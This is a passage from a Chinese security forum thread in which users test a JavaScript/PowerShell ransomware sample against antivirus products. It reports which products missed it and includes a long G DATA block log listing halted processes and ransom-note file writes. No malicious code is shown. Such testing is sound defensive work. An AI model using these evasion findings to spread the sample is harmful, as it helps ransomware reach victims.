楼主: Dolby123
收起左侧

[病毒样本] #PowerShell #ransomware

[复制链接]
2012rfreere
发表于 2017-7-10 22:32:07 | 显示全部楼层
ESET完全没
C:\Users\Administrator\Pictures

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
电脑发烧友
发表于 2017-7-10 23:14:08 | 显示全部楼层
pal家族 发表于 2017-7-10 22:23
试试允许第一个让他加密,看看会不会触发什么呗

卡巴败北,有意思的是这个勒索加密并不改变文件名(包括后缀)。

最终结论是:如果这是一个未拉黑入库的毒,那么默认状态下会完美中招,如果用卡巴的HIPS拦截了代码注入以及后面的一个弹窗,那么只会出现勒索信,并不会被加密。
westbyte
头像被屏蔽
发表于 2017-7-10 23:18:16 | 显示全部楼层
WD扫描没反应
900703
发表于 2017-7-10 23:23:51 | 显示全部楼层
ccboxes
发表于 2017-7-10 23:45:25 | 显示全部楼层
电脑发烧友 发表于 2017-7-10 23:14
卡巴败北,有意思的是这个勒索加密并不改变文件名(包括后缀)。

最终结论是:如果这是一个未拉黑入库 ...

2018会有更好的表现吧,卡巴重新开始注入所有程序,增添了更多的钩子,能拦截到更多行为。

不过相比主防,我更惊讶的是2019的UDS,这似乎说明KSN分拣样本的能力已经足够高。可以快速给出种类了。
,就一个.
发表于 2017-7-11 00:08:39 | 显示全部楼层
本帖最后由 ,就一个. 于 2017-7-11 14:16 编辑

赤裸裸过BD ATC和勒索保护

GD 拦截并回滚



Es wurden verdächtige Zugriffe auf Ihr Dateisystem entdeckt, die auf einen Verschlüsselungstrojaner schließen lassen.

Die folgenden Prozesse wurden deshalb von G DATA aus Sicherheitsgründen unterbrochen:
        ----------------------------------------------------------------
        C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe (PID 2248)
        C:\Program Files (x86)\Common Files\Tencent\QQProtect\Bin\QQProtect.exe (PID 3428)
        C:\windows\System32\svchost.exe (PID 1420)
        C:\windows\System32\svchost.exe (PID 1368)
        C:\windows\system32\taskhost.exe (PID 1996)
        C:\windows\system32\svchost.exe (PID 1448)
        C:\Program Files\Process Lasso\processlasso.exe (PID 2396)
        C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedul2.exe (PID 2200)
        C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe (PID 2256)
        C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe (PID 2836)
        C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe (PID 2140)
        C:\Program Files (x86)\Common Files\Acronis\Infrastructure\mms_mini.exe (PID 3076)
        C:\Users\Administrator\AppData\Roaming\baidu\BaiduNetdisk\YunDetectService.exe (PID 2960)
        C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe (PID 3320)
        C:\Program Files\Process Lasso\processgovernor.exe (PID 2360)
        C:\Program Files (x86)\PalmInput\2.7.0.1686\PalmInputStartUp.exe (PID 2908)
        C:\windows\system32\svchost.exe (PID 1480)
        C:\windows\SysWOW64\svchost.exe (PID 3520)
        C:\windows\SysWOW64\svchost.exe (PID 3540)
        C:\Users\Administrator\AppData\Local\360Chrome\Chrome\Application\360chrome.exe (PID 3880)
        C:\Users\Administrator\AppData\Local\360Chrome\Chrome\Application\360chrome.exe (PID 852)
        C:\Users\Administrator\AppData\Local\360Chrome\Chrome\Application\360chrome.exe (PID 4328)
        C:\Users\Administrator\AppData\Local\360Chrome\Chrome\Application\360chrome.exe (PID 4784)
        C:\Users\Administrator\AppData\Local\360Chrome\Chrome\Application\360chrome.exe (PID 5544)
        C:\Program Files (x86)\Common Files\Tencent\QQProtect\Bin\QQProtectUpd.exe (PID 6136)
        C:\windows\system32\wbem\WMIADAP.EXE (PID 804)
        C:\Program Files\WinRAR\WinRAR.exe (PID 3836)
        C:\Program Files (x86)\PalmInput\Extensions\Guard\2.6.0.49\PalmInputGuard.exe (PID 3560)
        C:\windows\system32\windowspowershell\v1.0\powershell.exe (PID 988)
        ----------------------------------------------------------------

Bei Blockierung werden folgende verantwortliche Programme in die Quarantäne verschoben:
        ----------------------------------------------------------------
        C:\Users\Administrator\Desktop\7a6d5ae7d7bc2849ea40907912a27e8aa6c83fafd952168f9e2d43f76881300c.js
        ----------------------------------------------------------------

Erkannte verdächtige Operationen:
        ----------------------------------------------------------------
        Erzeugt: D:\360Chrome\Chrome\User Data\Default\Extensions\elnacedabailodhgdljifcdmablecooh\1.0.0.1_0\_README-Encrypted-Files.html
        WRITE: D:\360Chrome\Chrome\Application\8.7.0.306\change_wallpaper.zip
        WRITE: D:\360Chrome\Chrome\Application\8.7.0.306\errorpage.zip
        WRITE: D:\360Chrome\Chrome\Application\8.7.0.306\history.zip
        WRITE: D:\360Chrome\Chrome\Application\8.7.0.306\last_tabs.zip
        WRITE: D:\360Chrome\Chrome\Application\8.7.0.306\newtab.zip
        WRITE: D:\360Chrome\Chrome\Application\8.7.0.306\options.zip
        Erzeugt: D:\360Chrome\Chrome\Application\npflash\_README-Encrypted-Files.html
        Erzeugt: D:\360Chrome\Chrome\Application\ppflash\_README-Encrypted-Files.html
        Erzeugt: D:\360Chrome\Chrome\User Data\adfilter\_README-Encrypted-Files.html
        Erzeugt: D:\360Chrome\Chrome\User Data\Default\360UID38663595_V8\_README-Encrypted-Files.html
        WRITE: D:\360Chrome\Chrome\User Data\Default\Extensions\elnacedabailodhgdljifcdmablecooh\1.0.0.1_0\00.png
        Erzeugt: C:\Windows\setupact.log
        Erzeugt: C:\Windows\setuperr.log
        Erzeugt: C:\ProgramData\Acronis\Schedule2\2017.07.11-05.57.35.088-schedul2.exe-DFE28A22-24CF-4C66-BC82-BA110C1D988E.log
        Erzeugt: C:\ProgramData\Acronis\Schedule2\2017.07.11-05.57.35.354-schedhlp.exe-418656C6-C24B-4B66-8010-686011585DE2-S-1-5-5-0-117205.log
        Erzeugt: C:\ProgramData\Acronis\TrueImageHome\Logs\NSB_2017-07-11-13-57-35.log
        Erzeugt: C:\ProgramData\Acronis\SnapAPILogs\SnapAPI-20170711-055735-478.log
        Erzeugt: C:\Users\Administrator\AppData\Local\Microsoft\Windows\WebCacheLock.dat
        Erzeugt: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\container.dat
        Erzeugt: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies\container.dat
        Erzeugt: C:\Users\Administrator\AppData\Local\Temp\plb66AE.tmp
        Erzeugt: C:\ProgramData\Acronis\Schedule2\2017.07.11-05.57.39.300-schedhlp.exe-483175A7-9964-40A9-9BB7-856C967A32DA-S-1-5-5-0-117205.log
        Erzeugt: C:\ProgramData\Acronis\TrueImageHome\Logs\ti_monitor\arw-client-rest.0.log
        Erzeugt: C:\ProgramData\Acronis\TrueImageHome\Logs\ti_monitor\ti-rpc-client.0.log
        Erzeugt: C:\ProgramData\Acronis\TrueImageHome\Database\temp
        Erzeugt: C:\ProgramData\Acronis\TndLogs\tnd-20170711-055742-470.log
        Erzeugt: C:\ProgramData\Acronis\SnapAPILogs\SnapAPI-20170711-055742-480.log
        Erzeugt: C:\ProgramData\Acronis\TrueImageHome\Logs\atih_mms_addon_2017-07-11-13-57-44.log
        Erzeugt: C:\ProgramData\Acronis\TrueImageHome\Logs\atih_services_addon_2017-07-11-13-57-44.log
        Erzeugt: C:\ProgramData\Acronis\MMS\CredVault\lock
        Erzeugt: C:\ProgramData\Acronis\MMS\RawVault\lock
        Erzeugt: C:\ProgramData\Acronis\TrueImageHome\Database\temp
        Erzeugt: C:\ProgramData\Acronis\SnapAPILogs\SnapAPI-20170711-055745-333.log
        Erzeugt: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IJ69B9HL\crossdomain[1].xml
        Erzeugt: C:\Users\Administrator\AppData\Local\Temp\Cab9D95.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\Temp\Tar9DF4.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\Temp\Cab9DF3.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\Temp\Tar9DF5.tmp
        Erzeugt: C:\ProgramData\NVIDIA Corporation\NvTelemetry\events.dat-wal
        Erzeugt: C:\Windows\System32\wbem\repository\WRITABLE.TST
        Erzeugt: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\clientreport[1]
        Erzeugt: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\726M3BLU.gif
        Erzeugt: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MD46AUNA.gif
        Erzeugt: C:\Windows\Temp\D8A2.tmp
        Erzeugt: C:\Windows\Temp\D8A3.tmp
        Erzeugt: C:\Windows\Temp\Cab81A.tmp
        Erzeugt: C:\Windows\Temp\Tar81B.tmp
        Erzeugt: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7RI2K4O4.gif
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\lockfile
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\E09D.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF1e09d.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOCK
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\data_reduction_proxy_leveldb\000003.log
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\Login Data-journal
        Erzeugt: C:\Users\Administrator\AppData\Local\Temp\etilqs_6ZaamuFZ4hoX4vc
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Web Data-journal
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\History-journal
        Erzeugt: C:\Users\Administrator\AppData\Local\Temp\etilqs_gdrMWMcKYLOKgWT
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Service Worker\Database\LOG.old~RF1e56e.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Service Worker\Database\LOCK
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cookies-journal
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000056
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000057
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000058
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Favicons-journal
        Erzeugt: C:\Users\Administrator\AppData\Local\Temp\etilqs_PPeXa7FPjWYsjzh
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000059
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_00005a
        Erzeugt: C:\Users\Administrator\AppData\Local\Temp\etilqs_q7nDkBWmvrdwzAc
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_00005b
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_00005c
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_00005d
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_00005e
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\F660.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\360sefav.dat~RF1f66e.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\F680.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Sync360_V8.sqlite3-journal
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\Bookmarks~RF1f68e.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_00005f
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\F6A0.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000060
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\Bookmarks~RF1f6ad.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000061
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000062
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000063
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000064
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000065
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000066
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\F74D.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\360mobilefav.dat~RF1f758.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Extension State\LOG.old~RF1f862.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Extension State\LOCK
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\360sefav.dat-journal
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\62.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\Bookmarks~RF2006d.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\4E6.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Local State~RF204ef.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\737.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\Preferences~RF20740.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\786.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Network Persistent State~RF2078e.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000067
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000068
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000069
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_00006a
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_00006b
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_00006c
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_00006d
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_00006e
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_00006f
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000070
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000071
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000072
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\101F.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\TransportSecurity~RF21016.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\JumpListIcons\17CE.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\JumpListIcons\17CF.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000073
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000074
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000075
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000076
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000077
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000078
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000079
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_00007a
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\3510.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\Preferences~RF23504.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_00007b
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_00007c
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_00007d
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_00007e
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_00007f
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000080
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000081
        Erzeugt: C:\Users\Administrator\AppData\Local\Temp\etilqs_RkfkoP1T6uJgiFR
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\6DCC.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\Preferences~RF26dbf.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000082
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000083
        Erzeugt: C:\Users\administrator\AppData\Local\360chrome\Chrome\User Data\Default\360UID38663595_V8\9C2D.tmp
        Erzeugt: C:\Users\administrator\AppData\Local\360chrome\Chrome\User Data\Default\360UID38663595_V8\Preferences~RF29c2f.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\A764.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Local State~RF2a755.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000084
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Session Storage\LOG.old~RF2cf7e.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Session Storage\LOCK
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\v3update\download\~D374.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\v3update\download\~D374.cab.~p2s
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\v3update\download\~D603.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\v3update\download\~D613.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\v3update\download\~D603.cab.~p2s
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\v3update\download\~D613.cab.~p2s
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\v3update\download\safeup_url64.ini
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\v3update\download\safe.ini
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\DC5A.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\Preferences~RF2dc4a.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000085
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000086
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000087
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000088
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_000089
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\71C6.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Local State~RF371b5.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Login Data-journal
        Erzeugt: C:\Users\Administrator\AppData\Local\Temp\etilqs_dlvrYDAOmuP9imk
        Erzeugt: C:\Users\Administrator\AppData\Local\Temp\etilqs_bVR0K8hohHz7tcK
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\71F6.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\Preferences~RF37203.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\Temp\4%FP0%Z)(`$K11~__9)$N.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\lockfile
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF3e899.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOCK
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\E899.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\data_reduction_proxy_leveldb\000003.log
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\Login Data-journal
        Erzeugt: C:\Users\Administrator\AppData\Local\Temp\etilqs_lhrtAmBa2ANMoF8
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Service Worker\Database\LOG.old~RF3e9d1.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Service Worker\Database\LOCK
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Web Data-journal
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\History-journal
        Erzeugt: C:\Users\Administrator\AppData\Local\Temp\etilqs_b9fhxANwnyMzH9i
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cookies-journal
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_00008a
        Erzeugt: C:\Users\Administrator\AppData\Local\Temp\etilqs_yAiiU8LLq1ze4rH
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Sync360_V8.sqlite3-journal
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\F113.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\360mobilefav.dat~RF3f112.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Extension State\LOG.old~RF3f288.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Extension State\LOCK
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\360sefav.dat-journal
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\FAD4.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\Bookmarks~RF3fae1.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Favicons-journal
        Erzeugt: C:\Users\Administrator\AppData\Local\Temp\etilqs_c6giAdjYmfccAin
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\8C9.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\Bookmarks~RF408c6.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Cache\f_00008b
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\F8E.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Local State~RF40f8a.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\FAE.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\Preferences~RF40fa9.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\FCE.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\FCF.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\TransportSecurity~RF40fc8.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Network Persistent State~RF40fc8.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\1EAE.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Local State~RF41ea6.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Login Data-journal
        Erzeugt: C:\Users\Administrator\AppData\Local\Temp\etilqs_Pgif6Oucq37NiYn
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\Local Storage\https_www.baidu.com_0.localstorage-journal
        Erzeugt: C:\Users\Administrator\AppData\Local\Temp\etilqs_XnXAZNN3hb6pSC7
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\1EBF.tmp
        Erzeugt: C:\Users\Administrator\AppData\Local\360Chrome\Chrome\User Data\Default\360UID38663595_V8\Preferences~RF41eb6.TMP
        Erzeugt: C:\Windows\System32\wbem\Performance\WmiApRpl_new.h
        Erzeugt: C:\Users\Administrator\Desktop\7a6d5ae7d7bc2849ea40907912a27e8aa6c83fafd952168f9e2d43f76881300c.js
        Erzeugt: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CJ4LV89D\guard_day_update[1].htm
        Erzeugt: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M9OR9RF8IKDKY3Q5F8UA.temp
        Erzeugt: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF466bd.TMP
        Erzeugt: C:\Windows\assembly\NativeImages_v2.0.50727_64\index1a8.dat
        Erzeugt: C:\Windows\assembly\pubpol7.dat
        Gelöscht: C:\Windows\inf\WmiApRpl\WmiApRpl.h
        Erzeugt: C:\Windows\System32\PerfStringBackup.TMP
        Erzeugt: C:\Users\Administrator\AppData\Local\Temp\cvp3DF9.tmp
        Erzeugt: D:\360Chrome\Chrome\User Data\Default\databases\_README-Encrypted-Files.html
        Erzeugt: D:\360Chrome\Chrome\User Data\Default\data_reduction_proxy_leveldb\000003.log
        Erzeugt: D:\360Chrome\Chrome\User Data\Default\data_reduction_proxy_leveldb\_README-Encrypted-Files.html
        ----------------------------------------------------------------

Der Zugriff wurde durch den Benutzer blockiert.


fever腾腾
发表于 2017-7-11 00:09:14 | 显示全部楼层
费尔miss
Dolby123
 楼主| 发表于 2017-7-11 01:57:52 | 显示全部楼层
xxl11231220 发表于 2017-7-10 19:34
js文件要怎么双击,嵌入html?

直接双击js  , 然后看见一个"假讯息"的弹窗 , 其实正在运行加密过程 , 文件被篡改并不修改扩展名...

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
B100D1E55
发表于 2017-7-11 03:32:40 | 显示全部楼层
